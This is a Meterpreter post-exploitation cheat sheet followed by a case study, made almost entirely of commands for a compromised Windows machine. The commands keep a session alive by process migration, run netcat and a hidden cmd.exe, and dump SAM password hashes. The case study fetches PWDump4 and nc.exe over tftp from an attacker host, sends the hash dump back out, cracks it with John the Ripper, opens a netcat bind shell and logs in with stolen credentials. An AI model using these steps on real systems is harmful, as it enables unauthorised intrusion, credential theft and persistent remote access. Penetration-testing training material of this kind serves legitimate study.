These examples assume that you have exploited a box and have a meterpreter session running.

Migrate to another process:

After running a browser based exploit, IE may crash.  The user may try to force quit the application using the

Task Manager.  In order to stay connected to the victim, you will need to migrate to another application.

ps

migrate 100

getpid

Kill a process:

ps

kill PID

Download a file:

download <file in current directory of remote source> <local destination>

download test.txt /root/Desktop/

Upload a file:

upload <local source> <remote destination>

upload /root/Desktop/test.txt C:\

Execute a file:

execute -c -f C:/nc.exe

Get a command prompt:

execute -c -f cmd.exe -H

interact 1

Dump the SAM file:

getuid

use priv

hashdump

1.   Case study
   

(meterpreter)

help

use -m Process

help

execute -c -f cmd

interact 1

C:\WINNT\system32>

        ipconfig

        hostname

        whoami

(open 2nd shell on BackTrack)

start tftp server

cd /pentest/windows-binaries/tools/

cp nc.exe /tmp

cp PWDump4.exe /tmp

cp PWDump4.dll /tmp

cd /pentest/password/dictionaries/

gunzip -c wordlist.txt.Z > /tmp/wordlist.txt

(meterpreter)

tftp -i attackIP get PWDump4.exe

tftp -i attackIP get PWDump4.dll

tftp -i attackIP get nc.exe

pwdump4 /l /o:dump.txt

tftp -i attackIP put dump.txt

(BackTrack)

cd /tmp

cat dump.txt

john -w:wordlist.txt dump.txt

john --show dump.txt

john -w:wordlist.txt -f:NT dump.txt

(meterpreter)

nc -lvp 4444 -e cmd.exe

(BackTrack)

telnet targetIP 4444

C:\WINNT\system32>

        ipconfig

        whoami

        exit

telnet target

login with cracked user account and password